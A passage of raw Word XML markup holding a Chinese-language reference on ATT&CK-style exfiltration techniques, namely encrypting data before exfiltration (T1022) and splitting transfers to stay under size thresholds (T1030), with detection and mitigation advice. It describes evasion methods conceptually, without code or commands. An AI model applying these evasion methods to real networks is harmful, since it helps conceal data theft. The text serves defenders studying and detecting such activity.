              <w:t>机制</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="068C8080" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="572A6A5E" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113F7703" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>通过多种方式来检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>压缩软件和压缩文件。监控进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已知</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>压缩实用程序的命令行参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来检测系统中可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>存在的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或由攻击者引入的通用实用程序。这</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>可能会产生大量良性</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>，具体取决于</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境中</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>系统的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>典型使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC55FEB" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果通信通道未加密，则可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>网络入侵检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>使用数据丢失防御系统来分析文件头</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>从而检测数据渗漏过程中正在传输的压缩文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F53AABF" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="004D08E3" w:rsidRDefault="004D08E3" w:rsidP="004D08E3"/>
    <w:p w14:paraId="10839DC8" w14:textId="725D6E87" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="00A0413E" w:rsidP="004D08E3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC5912">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidR="004D08E3" w:rsidRPr="00AC5912">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>加密</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="004D08E3" w:rsidRPr="00A65911" w14:paraId="2E113AE9" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2448B655" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t xml:space="preserve">T1022 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1487A8F5" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：数据渗漏</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33697CD2" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70E65881" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：文件监控，进程监控，进程命令行参数，二进制文件元数据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FDE535C" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>是否需要网络：否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F30CC10" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="660DBFDA" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38860BC7" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渗漏</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>之前先加密数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>为了躲避检测，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>使得数据渗漏在防御程序检查时不那么明显</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。加密是由实用程序、编程库或自定义算法对数据本身执行的。这种</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>加密</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与由</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或文件传输协议执行的加密是分开的。常见</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>可加密的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>压缩</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>格式</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RAR</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097E9542" w14:textId="47798559" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据加密</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>技术</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可与其他渗漏技术，例如经由</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据渗漏和</w:t>
      </w:r>
      <w:r w:rsidR="005A5E91">
        <w:t>备用协议上的数据渗漏</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，结合起来将信息传输到网络之外。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5830AEC9" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAE3C7E" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D53A80E" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D630BB5" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以通过多种方式检测加密软件和加密文件。监控进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已知加密</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>实用程序的命令行参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来检测系统中可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>存在的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或由攻击者引入的通用实用程序。这</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>可能会产生大量良性</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>，具体取决于</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境中</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>系统的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>典型使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>方式。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常，加密密钥在软件命令行调用中声明。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC50ACE" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态链接库</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crypt32.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的进程可用于执行加密、解密或文件签名验证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213C319E" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还可以对网络流量进行熵分析来确定是否正在传输加密数据。如果通信通道未加密，则可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>网络入侵检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>使用数据丢失防御系统来分析文件头</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>从而检测数据渗漏过程中正在传输的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC9AAFA" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="004D08E3" w:rsidRDefault="004D08E3" w:rsidP="004D08E3"/>
    <w:p w14:paraId="7B843508" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC5912">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据传输大小限制</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="1410EDE9" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19F37888" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A71ECA" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A71ECA">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A71ECA">
              <w:t xml:space="preserve"> T1030</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C63C05D" w14:textId="43946DB6" w:rsidR="00A0413E" w:rsidRPr="00A71ECA" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00A71ECA">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A71ECA">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="004D08E3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据</w:t>
            </w:r>
            <w:r w:rsidRPr="00A71ECA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>渗</w:t>
            </w:r>
            <w:r w:rsidR="008F7150">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09D78A27" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A71ECA" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A71ECA">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A71ECA">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CDBAFE5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A71ECA" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A71ECA">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A71ECA">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A71ECA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络抓包，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A71ECA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00A71ECA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术网络流分析，进程使用网络，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02F7A0BD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A71ECA" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70DE1D24" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A71ECA">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A71ECA">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6883C98D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00130104" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22D8121F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00A270AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以以固定大小的块而不是整个文件来泄露数据，或者将数据包大小限制在特定阈值以下。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A270AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A270AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该方法可用于避免触发网络数据传输阈值警报。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563BF851" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2122"/>
        <w:gridCol w:w="7614"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w14:paraId="421D8BB0" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="55B21916" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2C793CC8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="005E42A5" w14:paraId="1F6EE931" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0284C046" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="005E42A5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005E42A5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络入侵防御</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39D0EF08" w14:textId="1B16F73A" w:rsidR="00A0413E" w:rsidRPr="005E42A5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005E42A5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络入侵检测和防御系统使用网络签名来识别特定对手</w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
            <w:r w:rsidRPr="005E42A5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基础架构和恶意软件的流量，可用于缓解网络级别的活动。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
